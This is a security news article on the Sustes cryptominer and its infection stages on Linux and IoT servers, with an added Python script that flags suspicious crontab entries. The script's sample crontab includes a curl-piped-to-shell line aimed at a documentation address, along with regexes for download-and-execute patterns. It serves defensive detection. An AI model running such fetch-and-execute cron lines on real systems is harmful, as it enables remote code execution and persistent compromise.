Custom Sustes Malware Infects Linux and IoT Servers Worldwide

Haythem Elmir

The Sustes malware is a custom-built threat recently observed in a worldwide infection campaign. It spreads through an unusual mechanism and is designed to load a cryptocurrency miner onto the targeted systems. The scale of the damage cannot yet be determined.

The Custom Sustes Malware Infects Servers With Miner Code

A recently published security report has revealed a new threat identified as the Sustes malware. It is of interest to analysts because Sustes is entirely custom made by an unknown hacker or criminal collective. What is particularly interesting is its distribution: it does not spread as a worm or through direct injection. The victim hosts identified so far show that the targets are mainly Linux and IoT servers. Infection happens through exploitation and brute-force attempts against the servers. A script is then launched that drops and executes further components, including a dropper.

Once the initial script runs, it follows a multi-stage pattern:

  • The first actions are a stealth-oriented technique: the malicious engine scans the target system for running applications and services and, using known application signatures, determines whether such software is installed.
  • Network connections are evaluated, and processes connecting to specific addresses are killed.
  • When these two stages are complete, the payload dropper is started and downloads the Sustes malware to the host.
  • A crontab entry is set up so that the malware code is re-executed periodically.
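The last two stages, a download-and-execute script and a crontab entry that keeps re-launching it, are a common persistence pattern, and the crontab is one of the first places a responder checks on a suspected Linux host. The script below is an added example, not code from the original article or from the Sustes analysis; it audits a crontab dump for job lines that fetch and pipe content into a shell, decode inline base64 into a shell, or run a binary from a world-writable directory. The heuristic patterns and the sample crontab (including the RFC 5737 documentation address 192.0.2.10 and the path `/tmp/.cache/run`) are constructed for illustration and are not indicators from the report.

```python
import re
from typing import Dict, List

# Constructed sample crontab dump for this example (not from the original article or
# from a real infection). Two benign entries, then two entries of the kind the text
# describes: a periodic download-and-execute, and a launcher living in /tmp.
# 192.0.2.10 is an RFC 5737 documentation address.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
SHELL=/bin/sh
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * /usr/local/bin/backup.sh >/dev/null 2>&1
*/10 * * * * curl -fsSL http://192.0.2.10/x.sh | sh
@reboot /tmp/.cache/run >/dev/null 2>&1
"""

# Heuristic patterns (assumptions for this example). Each label maps to a regex that is
# applied to the command part of a job line only, never to the schedule fields.
PATTERNS: Dict[str, re.Pattern] = {
    # fetch something with curl/wget and hand it straight to a shell (or chmod it first)
    "download-and-execute": re.compile(
        r"\b(curl|wget)\b.*(\|\s*(ba|da)?sh\b|(;|&&)\s*(ba|da)?sh\b|(;|&&)\s*chmod\b)"),
    # inline base64 blob decoded and piped into a shell
    "decode-and-execute": re.compile(r"\bbase64\b.*(-d|--decode).*\|\s*(ba|da)?sh\b"),
    # binaries launched from world-writable, typically tmpfs, locations
    "runs-from-world-writable-dir": re.compile(
        r"(^|[\s=|;&])(/tmp|/var/tmp|/dev/shm)/"),
}


def parse_crontab(text: str):
    """Yield (line_no, schedule, command) for each job line in user-crontab format.

    Comments, blank lines and VAR=value environment lines are skipped. Both the
    five-field form and the @reboot/@daily shorthand are handled.
    """
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", line):
            continue
        if line.startswith("@"):  # @reboot, @daily, ...
            parts = line.split(None, 1)
            if len(parts) == 2:
                yield n, parts[0], parts[1]
            continue
        parts = line.split(None, 5)  # five time fields + command
        if len(parts) == 6:
            yield n, " ".join(parts[:5]), parts[5]


def suspicious_cron_entries(text: str) -> List[Dict]:
    """Return the job lines whose command matches at least one heuristic."""
    hits = []
    for n, schedule, command in parse_crontab(text):
        reasons = [label for label, rx in PATTERNS.items() if rx.search(command)]
        if reasons:
            hits.append({"line": n, "schedule": schedule,
                         "command": command, "reasons": reasons})
    return hits


if __name__ == "__main__":
    # On a live host, feed it the output of `crontab -l -u <user>` or the files under
    # /var/spool/cron and /etc/cron.d instead of the constructed sample.
    for hit in suspicious_cron_entries(SAMPLE_CRONTAB):
        print(f"line {hit['line']}: [{hit['schedule']}] {hit['command']}"
              f"  <- {', '.join(hit['reasons'])}")
```

The patterns are deliberately narrow: a legitimate `wget` in a backup job is not flagged unless its output is piped into a shell, and the tmpfs check only fires when a path under `/tmp`, `/var/tmp` or `/dev/shm` is the command being run, not merely mentioned in an argument. Treat any hit as a lead to confirm by reading the fetched script or binary, not as proof of compromise.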

The custom Sustes malware then downloads a configuration file from a remote server containing several wallet addresses. This is part of the cryptocurrency miner deployment, which installs a Monero-mining application. Analysis of the addresses has led the security analysts to […]

To read the original article:



Next Post

Cisco Patched Critical Vulnerability With Video Surveillance Manager Appliance

Cisco patched a critical security vulnerability in Cisco Video Surveillance Manager (VSM) that allows an unauthenticated remote attacker to gain access to a vulnerable system as root, because the root account ships with default, static credentials. An attacker could exploit this vulnerability by using the account to log […]